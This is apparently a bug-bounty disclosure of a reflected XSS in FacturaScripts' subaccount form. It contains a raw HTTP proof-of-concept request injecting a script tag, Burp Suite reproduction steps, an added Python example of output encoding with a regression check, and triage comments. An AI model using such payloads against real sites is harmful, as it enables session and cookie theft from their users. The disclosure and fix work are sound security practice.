Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts
Valid
Reported on Apr 30th 2022
Description
Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.
Proof of Concept
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"
insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"
EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"
<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"
123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"
2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"
CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"
0
-----------------------------363416527826407339693188325960--
Steps to reproduce
- In the Accounting section, choose New and fill in the form with any values.
- Use Burp Suite to intercept this request, change the codsubcuenta parameter value to the XSS payload, and click Forward.
- The alert(1337) executes.

Impact
This vulnerability allows arbitrary JavaScript to execute in the victim's browser, which can be used to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, etc.
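To make the root cause and the fix concrete, here is an added example (not FacturaScripts code): it pulls codsubcuenta out of a trimmed, constructed copy of the PoC body above, renders it through a hypothetical unescaped template and through the same template with contextual output encoding, and runs the regression check a maintainer would keep in a test suite to confirm the value is no longer reflected unencoded.

```python
import html

# Values taken from the PoC request above; POC_BODY is a trimmed,
# constructed copy of that multipart body (three of the original fields).
BOUNDARY = "---------------------------363416527826407339693188325960"
PAYLOAD = "<script>alert(1337)</script>"
POC_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninsert\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"codsubcuenta\"\r\n\r\n{PAYLOAD}\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"descripcion\"\r\n\r\n123123\r\n"
    f"--{BOUNDARY}--\r\n"
)


def extract_form_field(body: str, boundary: str, name: str):
    """Return one field's value from a multipart/form-data body
    (enough parsing for a PoC like the one above; no file parts)."""
    for part in body.split("--" + boundary):
        headers, sep, value = part.partition("\r\n\r\n")
        if sep and f'name="{name}"' in headers:
            return value[:-2] if value.endswith("\r\n") else value
    return None


def render_field_unsafe(codsubcuenta: str) -> str:
    """Hypothetical template that echoes the submitted value verbatim;
    this is the pattern that produces the reported reflected XSS."""
    return f'<input type="text" name="codsubcuenta" value="{codsubcuenta}">'


def render_field_safe(codsubcuenta: str) -> str:
    """Same template with contextual output encoding. quote=True also
    encodes quote characters, so the value cannot leave the attribute
    (PHP equivalent: htmlspecialchars($v, ENT_QUOTES, 'UTF-8'))."""
    safe = html.escape(codsubcuenta, quote=True)
    return f'<input type="text" name="codsubcuenta" value="{safe}">'


HTML_SIGNIFICANT = set('<>"\'&')


def reflected_unencoded(response_html: str, submitted: str) -> bool:
    """Regression check: the submitted value contains HTML-significant
    characters and appears verbatim in the response, i.e. unencoded."""
    return bool(HTML_SIGNIFICANT & set(submitted)) and submitted in response_html


if __name__ == "__main__":
    value = extract_form_field(POC_BODY, BOUNDARY, "codsubcuenta")
    print("vulnerable:", reflected_unencoded(render_field_unsafe(value), value))
    print("fixed:", reflected_unencoded(render_field_safe(value), value))
```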
We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back.
@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️
Hi @maintainer, the fix is already released, can you assign a CVE here? If you can, I hope @admin helps.